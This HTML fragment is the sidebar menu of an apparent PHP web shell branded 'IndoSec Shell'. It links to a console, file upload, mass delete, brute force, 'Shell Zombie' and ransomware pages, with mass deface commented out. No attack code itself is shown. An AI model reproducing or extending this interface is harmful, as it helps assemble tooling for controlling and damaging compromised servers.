<!-- Left Panel -->
<aside id="left-panel" class="left-panel">
  <nav class="navbar navbar-expand-sm navbar-default">
    <div class="navbar-header">
      <button
        class="navbar-toggler"
        type="button"
        data-toggle="collapse"
        data-target="#main-menu"
        aria-controls="main-menu"
        aria-expanded="false"
        aria-label="Toggle navigation"
      >
        <i class="fa fa-bars"></i>
      </button>
      <a class="navbar-brand" href="">{ IndoSec Shell }</a>
      <a class="navbar-brand hidden small" href=""> {} </a>
    </div>

    <div id="main-menu" class="main-menu collapse navbar-collapse">
      <ul class="nav navbar-nav">
        <li class="active">
          <a href="?"> <i class="menu-icon fa fa-dashboard"></i>Dashboard </a>
        </li>

        <h3 class="menu-title">Files</h3>

        <li>
          <a href="?page=filemanager">
            <i class="menu-icon fa fa-folder-open-o"></i> File Manager
          </a>
        </li>
        <li>
          <a href="?page=upload">
            <i class="menu-icon fa-solid fa-upload"></i> Upload File
          </a>
        </li>
        <li>
          <a href="?page=backup">
            <i class="menu-icon fa fa-file-archive-o"></i> Zip / Unzip
          </a>
        </li>

        <h3 class="menu-title">Mass</h3>

        <!-- <li>
          <a href="?page=mdeface">
            <i class="menu-icon fa fa-list"></i> Mass Deface
          </a>
        </li> -->
        <li>
          <a href="?page=mdelete">
            <i class="menu-icon fa fa-list"></i> Mass Delete
          </a>
        </li>

        <h3 class="menu-title">Tools</h3>
        <li>
          <a href="?page=search">
            <i class="menu-icon fa fa-search"></i> Search
          </a>
        </li>
        <li>
          <a href="?page=console">
            <i class="menu-icon fa-solid fa-terminal"></i> Console
          </a>
        </li>
        <li>
          <a href="?page=adminer">
            <i class="menu-icon fa fa-database"></i> Adminer
          </a>
        </li>
        <li>
          <a href="?page=network">
            <i class="menu-icon fas fa-network-wired"></i>
            Network
          </a>
        </li>
        <li>
          <a href="?page=shellzombie">
            <i class="menu-icon fa-solid fa-biohazard"></i> 
            Shell Zombie
          </a> 
        </li>
        <li>
          <a href="?page=bruteforce">
            <i class="menu-icon fa fa-hammer"></i>
            Brute Force
          </a>
        </li>
         <li>
          <a href="?page=ransomware">
            <i class="menu-icon fa fa-lock"></i>
            Ransomware
          </a>
        </li>
        <!-- <li>
          <a href="?page=mail">
            <i class="menu-icon fas fa-network-wired"></i>
            Mail
          </a>
        </li> -->

        <h3 class="menu-title">Lainnya</h3>
        <li>
          <a href="?page=phpinfo">
            <i class="menu-icon fa-brands fa-php"></i> Php info
          </a>
        </li>
        <li>
          <a href="?page=about"> <i class="menu-icon ti-info"></i>About </a>
        </li>
      </ul>
    </div>
    <!-- /.navbar-collapse -->
  </nav>
</aside>
<!-- /#left-panel -->
